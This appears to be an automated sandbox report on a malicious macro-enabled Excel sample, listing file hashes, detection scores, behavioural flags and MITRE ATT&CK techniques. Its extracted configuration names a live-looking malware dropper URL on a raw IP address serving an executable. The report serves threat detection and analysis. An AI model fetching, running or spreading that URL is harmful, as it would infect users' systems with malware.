Overview

overview

10

Static

static

8

03700e0d02...7.xlsm

windows7-x64

10

03700e0d02...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    8488276877.zip

  • Size

    21KB

  • Sample

    221124-p21c4shd81

  • MD5

    ea32ce9a3bd7befb0ba0644fdb5cbc62

  • SHA1

    67d2da97b71882d62a35590589725ed1dd52ab12

  • SHA256

    38c01d803a9f1661e967026991ef6cade30ee75b2fcfb3dc8d7e3c72f3d19378

  • SHA512

    371f87018ac28396df60576ccd1530ee56780d4a1b2d15e307ad8a54b6660bedef3501d5a95752246c51878327c1adbb3d865d465a6563b6198e868992dd76f6

  • SSDEEP

    384:F4oaiga0m1qbiE4zRy5i00Mk1fq9UuydRRA6kqM6YHtvxJZ9sxVieN4M:F3aL4QiRywWk1fBuy/2TZJZQQeiM

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://72.167.223.219/MSDriverLoader.exe

Targets

    • Target

      03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7

    • Size

      24KB

    • MD5

      3e8ee32c4a5c24dbfe4e3ded8b8dc9e5

    • SHA1

      23d75638b70178df3c0fa6df8879d819dab2037d

    • SHA256

      03700e0d02a6a1d76ecaa4d8307e40f76e07284646b3c45693054996f2e643d7

    • SHA512

      199e4a39c8642c1ec7f508cbe7f14104e258352067486d43de8c14d7a82e9a9f6352576e9078c14faa5a37bba3ee8d4ab2a454be132750931b5f90c4524fecc9

    • SSDEEP

      384:EtJBybZuEU0m3jl1JPxyPqK56i7Df1uhxGGoetIUt8cpL4MxTTXBvk2Gf6BEspaQ:NbZFpwhWDfIh9jtIS4MxTN8ViBPL

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks